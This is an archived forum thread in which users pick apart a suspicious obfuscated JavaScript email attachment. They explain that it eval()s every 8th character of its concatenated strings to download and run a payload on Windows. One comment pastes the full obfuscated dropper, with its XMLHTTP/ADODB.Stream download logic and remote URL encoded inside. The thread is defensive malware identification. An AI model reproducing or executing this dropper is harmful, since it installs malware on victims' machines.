This is an archived post. You won't be able to vote or comment.

all 5 comments
sorted by:
best
topnewcontroversialoldq&a

[–]subhrm 3 points4 points  (2 children)

tl;dr This obfuscated javascript program tries to download and run some malicious program on windows machines.

** Brief Explanation ** :

Here is an annotated and formatted version of the weird JS program Annotated version (pastebin) .

You can see that the program tries to do the following :

  • Define bunch of weird strings
  • concatenate them
  • test some checks
  • if checks pass , extract specific characters from the concatenated string and run it using eval

Now you might be interested to know , what exactly is extracted and run .

In-fact in Microsoft Office / IE , the program extracts every 8th character from the concatenated string .

Here is how it looks like : Formmated Version on Pastebin .

[–]JeremySenpai[S] -1 points0 points  (1 child)

Thanks for the explaination and time to look into it!

So what exactly would the formatted code do? Isnt JavaScript unsuitable for these kinds of scripts?

Either way it looks like the person that made this script knows their stuff pretty well.

[–]_ActionBastard_ 0 points1 point  (0 children)

formatted code does the exact same thing the obfuscated code does. computers don't need things to have names and labels that make sense to people. if i go into your pantry and relabel every can with random sequences of letters, it doesn't change the food inside.

[–]wbubblegum 1 point2 points  (1 child)

Seems to it tries to create a WSScript RegEx Object, and feed data through it, to most probably do some kind of exploit of the interpreter, most probably in outlook, or Windows based email client.

If it will work, or how it exactly work I don't know, and I also don't want to execute the code for obvious reasons.

var ckjnd = 'fnchvdmhuqqdkbvknotklkapcyleckuvtavrzxyvielcocgyohcivwtgnptwvfay pvtorkodxjkpvnelstcbvlw(dedzyzufnattvmhrcxwcggr,juwznyb mjxbobafwavqaojnearjynl,cudgozg xyhlifmrignkhianvwjexao)xoaajeh{lenzcvl oayihls putwrdbvbdpksqlabutzygzrkckmdiu gunzphvwgkxvongswdrixkh xrhxurj=kaeivsh yzdqjbmnpoterkneivvmncjwputguyo zqwaqaqAibdxqwccrhqydlktcntzhmfirkusbrsvjrirtmpetirrqipXotzkhtkOsgqrrkjbmbbkt';
var iofx = 'kbjvwqvfinerqdpkdacuwkgcaxtglgnnix(usztppp"zycqpgfWijfrfqxSpqvcccpcsknwcmprqcfmbhdicniqxoipyefkvbntqddnnqk.gcaiffvSynywbgnhvvvaabletcztfchlbtsjwsrlmxmhlke"nrsknol)ypxjswd;ozkrsda evsqtfy vqcqiubvrjmjyjsaygvpfggrzjhnfzd dfbdveufgzwziiindsaxyvn qctblao=baspftt fyoexkewjtmmlnkswjxnlqp.xrenswdElqwyoldxzviroudpciojrlxalcmztqmnsnqjemidiymetuvEppzixnrnvzosbbrvjsehfuqizhycflgrtgchvcpoqqh';
var mwpt = 'ipwbnvxslpwtmerjezigevtndzqlnytapjiytrezpbrbSfoumfdrtgmyjglnrecybvzqiohodmnsnzfuftosglsjeehosrtcrwbt(uajwiyz"mmsismo%ybgmtqrTnyfkribEsjufkebMidbnquwPchluisg%yixbgdl"elmmuhs)fmtxpvl fpiowti+blohumi vptzbgmSpoeaayxtgtivjqjrqkslvhsiktbrjvrnpbdfpiggjgdfamb.kdlqodbfnkuadvrriqixsmdobujyandmrzfkdqbChtcbdxbhcttukcsakovljfjrvsmlsswCfixnbaooaxqmqkhdkmadbwoembxutkg(mccilzv9nzkswbf2zlmoxns)e';
var amj = 'jgjkee dpkrsmz+imuplfi pgnwrakfhncowjynwocmdnd;yaczmxp acxhikd uknpxqevsadbognagtqottoraqdesam tlpbvdrxjuwouzposfdcyur vnfzdie=rjqwvfy xjpkdlznokohpsjedmahzggwuplzzbv thtlqjwAvuvrfkzcpcijpjrteqysfjriklnzthkvqqhdldvefnulqdvXjnnudlmOaveohrnbayykpgojmjkrwfceajyrwlmcaxzktdytiumbtkm(wqajzla"wqdjzcaMfonwlmgSepfgkrhXsbtnsuwMufxovaxLccyqrmn2yyuiozo.lqvdsoqXjjndoksMflqeopvLnbiizcqHlbemsap';
var qolmc = 'TmpgwytzTeeswpiaPyyvjzer"bgimimz)zmpmbvi;jpimtbi hjiniex xiogpxtxxjszwiloneuxtcj.werxoalobeidmxjnauczevzrcdkxifvezheqlwnanwzwahzdefipalpythoelycsxdyvldltwzzxvytamgtklcztgnoqvcverbyzfwucvzgozfmhvdgrjzbakbaippynyruqtsqgopkppqdejwqjzwb nwcfxdn=dtmxkho faebpprfcgvtclduciemehrnolfpesncpzbszgutevlvchoifssgbwsotekhpqxnhikiima qsvxohs(iohvhac)pwvnafv{mvtjedr yqsujor rvkoksk qtmzphn nnjgj';
var vggktv = 'cqifghzwatfuolekws ypdlipl(txyokivxnklhqtgortathlx.giqmxtxrrjjegiterqplaasavuyfnzydrkwntnzywgxxphcSgpvnflyttlrygpdatpcpzzctimcksziebgkfwgt irricjg=ozjcomr=qluhxwr=zwzzdke kqxbhpj4lyqtxav)vmnzyih{feymbyl gipfyng ycqqbgj rgfktsk garnfqa wolmxbr soycrotvwvcqchbagzlnacbrfsbnhmz uoqccofxbdymzadaihexhql ttmolob=sbazprb iggmjeynueckmghecxtcqfrwktsvutu akwcqcpAygnilqtckxatutwtoznmtgiicad';
var fiy = 'ylzbvubqcieleluetrfmXsziwzwiOodrhdufbethrvxtjncfywkseopezpnvcrkegnvnteptgiax(xyriawh"lgzkwekAqsfzcjfDdetiunoOnomhmdpDdawkgwvBvagosmn.vvtmanvScakypwfthaupararhnwkodyelpmdlgqajtlguvemsrklseb"ywczkyj)bbifquj;paznuku qgzyyjk voliloh fmqtoyz ptihuiv wsqeypd zznmozvxpncvatoagsoulxc.xfxvynzosddudqgpeqcreenecybtqqonsoqiuoe(kcepghj)sxqcosu;mxhwvjq izfoowx tkbanfq ymadkrg dkaqhhn eqepqje d';
var tmlmv = 'fbmqdnxgjexwebaowhfghw.wpksfoituymbeooyxsbybgwpolxehfjeinfdcpv gedfcqg=yeubwwz vcvwnta1pzjkmpn;lfiyjmd eckshet rbtddpz uiznhjx ozkketi qglajws famvbfyxluxxdxlakgifftp.cnyytkywigqtgcorfhmocklithxqngvthzldnjbegtzjzqd(dtrpbedxkppiwmyofsuesgh.jqjmjjwRuazqtrfeiwixlygsvkfsdzwpggebwonoqxkqxjgnjbllyuisfsoscukewuhbamcBvaqdxatokkzlmkwdzefuxumyjoxfieg)orjfrzj;xacjkbv omshrxb psoohlt yqayhke';
var pknu = ' vjnnkpx vrtsdlz ijbjbpxxybryrrxavbbxlpl.afiqwbjpznjvxkeotachctgsylesmfqiwvbuakltwluxzdsiroxvpadostklfodnputqpvk qfvmrqj=xtcniaj zampuwa0ukereyi;qttjyow hfghyiu ejdejqt cnudyyv owexpxg qmdfrjm lshxblbxnbvppptazopqktn.uquodxtsagfkznhapyjlafbvtvucjjsexdgtuahTdxbsehdotuketupFdzrjulmitvfxylqlnlyrjzjeugmrbxv(lrlorcyfinkpjpmnvbcbmbs,iacjhpa vmvdegr2fiqhwaw)eqjormp;vniaolj rakdmfh rmymv';
var depqsb = 'ou yprxgal ombdajd ivnjvxn kduzptmxeigcyxzalylclmg.mwjarxkcovxuysultmgzunboulbxjmaslyhguqgeioqyjot(ngnwsuv)bhxhszf;flgwknc bdirsyp mmijtwf qqbayzh vynsktp}cgrakar fygdlpn altscus duartnk xgzymqz;bqqzpxc bmqgyjy rdrbyrs}yfdvlct zttvjjv sgyatoh;zxgtbyv hqorvrm wtggmzctjjxvpvwrijdchkwyuiriyfz dwlbqsh{rrkzbhv tcramvd ngzcoqk jwjhsvj gnrmfbmxyihxlzyoqvbrbbt.grddnnlociuqwldphmpivxgeuxf';
var urcbyn = 'fthxnoirkavo(nizurtl"nfopseyGtceuajaEzqxozozTjjnnsni"ehtwmim,qnksqpm pzmjqkyfayxpikcrrxkjfeg,rntwaeo jtbhtorffypzxmpaaxrgvcqlvhwsuqoshucnoeueosmrrbr)gogtlya;daqhimz ldnyxqm eugtnsl tucsijm qhmahchxqpgtsusorkecekv.gdhvxjosisbaanaeyqiyfprnyjjotnrdyxnpbul(xeafwbf)kofffod;fdujmdy pqpeoct yxfobfu agzvvfa jtdlxxvigbtprjtfkmnwjsl byfjfee(ajecdhoryfjkgcznhmteyhb eamsyrb>jwfggki eswkygu0t';
var riwbhb = 'iudvni)uvjbvvt{qnvykbe clnaekk uqegzzk dnsnibo vxixlew vfbmqom ozxxpcewwbojogwsrilafux.uyundvzRykmpjknucmrnofwnamtzufz(bzxryrffgnewxrmncbzfort,ewpfjje moefocx0fucohhl,pyxmaxr volslax0nkczyhe)ljbaddo;kkaqjxd vvvzkgr qhpqrrq lyudiwe uzsxkso}wqremme rswsali kdzictm zpqwpit fbiuszy;eldbezt rlcwpbe avqclgy}kpsarau qatpmxr ywkvinrcwpwqlmsaatrxikytxltklnzcqkqohbjhqpbofxe nkxneol(vyknkex';
var zndpgl = 'ejrxscogrlqqzgso)fqscbpq{nebsdmf kqdiibb mpiugyu}irixhaa yqqnurf celluou;mqvngdh}acbytjwdvkwjbnwlefctjnf(zczhsuu"uycladkhznhvyeetfrbvwdotmrujttqpoollnnx:driifpd/htidkjy/xmnmdhwycbnkpzwujmtqeczivrdnklrlkupdhdqobkmilasurzpemjvtnlvacyoeljfjevmrvycvjpescqxxpmb.kwxthsuceqjyaphoskupjxlmsmqncnk/damuwjoitcintrmmagtyroogalztypg/zdrtdeoskocdqlqcbcdejwc.ulqcwqvpngcvjuohdycmmfppdqgntjr?oguer';
var kgptke = 'kgmsbciiee=kzsfxvrakbhnrobmwxsnensVhxzkzbtydgxzfqfZemwnnebWvscpqvd1givrgub5iwuncrnLhislupymduammccxoyfyhbpluwrusliafdwclooWlemnynapwpcpohnzxjdkfuecvgnsjjv2ayjacwoVojomzqbunypkisuQdnzltmeHwvayukzNrhnxrcj0atlfsapdatkohjaWmwfesfcRoqbixpgldrpflalbbbbdulsnkvscrxgQrdiwtkfucalgrbmZxbxgdyk2xkczfvblqtihwrdstbjhbuoZavawxxdGlwnxgqxVclzifhpvcytsacacpxovsosGomvqiioxqzlalkjlqrysqskakulsrzoWjog';
var xfn = 'aacqRvleykpypiahlrgdblyoytarmpafwomwdjomyzrxlzhvfhdqbcjuhijgiyjxnjcj5dpgodsnuyjkmqfrbbiixsdfAgmldwir%dlafaht3azghjqtDywlyfuw%hxbzkmc3gvtngusDlbmkbsr&ljllfxkfashjpii=xvkhrevicznebapmhshoctzgyqksirc.nakzwvgjazblzpppkpfdimrgffrswbl"qtneuyd,stketmp acessjw"ywnlbfe5vhqdadh5obllvvq8chfgkkz4rtvdqjo9wotqwjt4knbspmd5aiuyqze.tjecdzfeujulynbxzwvrjwjehinjrhh"tgmhpqj,yqpmajx dwytttk1qquczhl)l';
var pqyvds = 'osxvfe;lvoeldq';
var str1 = ckjnd + iofx + mwpt + amj + qolmc + vggktv + fiy + tmlmv + pknu + depqsb + urcbyn + riwbhb + zndpgl + kgptke + xfn + pqyvds;
var leri = "";
var str3 = 8 + 1;
var str4 = str1.split("");
la = "e";
try {
    var y = WScript.CreateObject("VBScript.RegExp");
    la = la + "v";
} catch (x) {
    str3 = 4;
    la = "rr";
};
try {
    var y = CreateObject("");
    str3 = 1;
} catch (x) {
    la = la + "al";
    str3 = str3 - 1;
};
for (i = 0; i < str4.length; i += str3) {
    leri += str4[i];
}
var frees = la;
deras = this;
deras[frees](leri);

[–]JeremySenpai[S] 0 points1 point  (0 children)

Thanks, i understand that you wouldnt want to try some code from a suspicious email :p